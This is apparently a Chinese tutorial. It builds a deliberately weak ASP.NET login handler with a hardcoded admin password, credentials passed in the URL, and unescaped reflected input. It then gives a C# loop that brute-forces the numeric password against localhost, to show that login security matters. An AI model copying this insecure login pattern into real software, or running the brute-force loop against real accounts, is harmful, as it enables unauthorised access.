首先写出一段登陆程序:
//ashx端 <%@ WebHandler Language="C#" Class="AddCalation" %> using System; using System.Web; public class AddCalation : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/html"; string ispostback=context.Request["isback"]; string username = context.Request["username"]; string password = context.Request["password"]; if (ispostback == "yes") { if (username == "admin" && password == "2314") { context.Response.Write("登陆成功"); } else { context.Response.Write("登陆失败"); } } else { username = string.Empty; password = string.Empty; } string path = context.Server.MapPath("AddCalation.html"); string content = System.IO.File.ReadAllText(path); content=content.Replace("@user",username); content = content.Replace("@pass", password); context.Response.Write(content); } public bool IsReusable { get { return false; } } } //html端 <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>加法计算器</title> </head> <body> <form action="AddCalation.ashx"> <input type="hidden"value="yes"name="isback" /> <label for="user">用户名</label> <input type="text" id="user" value="@user"name="username" /> <br /> <label for="pass">密码</label> <input type="password" id="pass"value="@pass" name="password" /> <br /><input type="submit" value="登陆" /> </form> </body> </html>
然后写一段C#控制台程序进行暴力破解
1 using System; 2 using System.Collections.Generic; 3 using System.Linq; 4 using System.Net; 5 using System.Text; 6 using System.Threading.Tasks; 7 8 9 namespace PasswordBreak 10 { 11 class Program 12 { 13 static void Main(string[] args) 14 { 15 WebClient wc = new WebClient(); 16 wc.Encoding = Encoding.UTF8; 17 string s=""; 18 for (int i = 0; i < 5000; i++) 19 { 20 s = wc.DownloadString("http://localhost:41566/AddCalation.ashx?isback=yes&username=admin&password=" + i); 21 if (s.Contains("登陆成功")) 22 { Console.WriteLine(i); break; } 23 } 24 Console.WriteLine(); 25 Console.Write(s); 26 Console.ReadKey(); 27 } 28 } 29 }
通过循环依次试验密码来破解自己写的登陆代码中的密码
所以说登陆端口的安全性非常重要。